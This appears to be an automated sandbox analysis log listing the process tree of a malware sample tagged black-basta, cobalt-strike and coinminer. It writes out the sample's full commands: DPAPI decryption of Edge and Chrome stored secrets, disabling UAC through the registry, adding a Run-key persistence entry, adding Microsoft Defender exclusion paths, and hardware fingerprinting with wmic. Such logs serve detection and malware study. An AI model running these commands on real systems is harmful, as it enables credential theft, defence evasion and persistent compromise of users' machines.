      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5496
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:4864
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:5528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4152
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5828
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        Adds Run key to start application
        
        PID:6084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.rQv6PEZLgc""
      4⤵
      PID:8
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.rQv6PEZLgc"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:1280
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:2584
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:3016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5764
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:1484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:5700
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:3024
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:6032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:1792
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:2468
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:1716
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:1228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:6104
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
PID:4664
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  PID:5196
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:2228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\FH2aiOwvIi.ps1""
      4⤵
      PID:1656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\FH2aiOwvIi.ps1"
        5⤵
        
        PID:3088
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmr30ucf\xmr30ucf.cmdline"
        6⤵
        
        PID:5784
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA865.tmp" "c:\Users\Admin\AppData\Local\Temp\xmr30ucf\CSCA66CB63F50A447A5844047B1DBA5A4E4.TMP"
        7⤵
        
        PID:5384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2464
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:4428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:5660
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:4280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:3704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:3848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4692
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:4880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        Adds Run key to start application
        
        PID:4820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.StOOPnBF8Y""
      4⤵
      PID:4172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.StOOPnBF8Y"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:4224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        
        PID:2600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:744
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:1052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:3336
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:4912
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:4752
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:1192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4432
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:5996
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:3996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:1356
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
      4⤵
      PID:4796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
PID:5648
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  PID:2448
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:1376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\0vKQBpFkwq.ps1""
      4⤵
      PID:860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\0vKQBpFkwq.ps1"
        5⤵
        
        PID:2164
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v4sou3yl\v4sou3yl.cmdline"
        6⤵
        
        PID:1092
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB14E.tmp" "c:\Users\Admin\AppData\Local\Temp\v4sou3yl\CSCD96D1AF631154A4BA54CD9AC27EEC938.TMP"
        7⤵
        
        PID:1516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:2976
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:3520
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:892
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3220
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        
        PID:1420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        
        PID:1872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:4796
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:4520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:4108
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
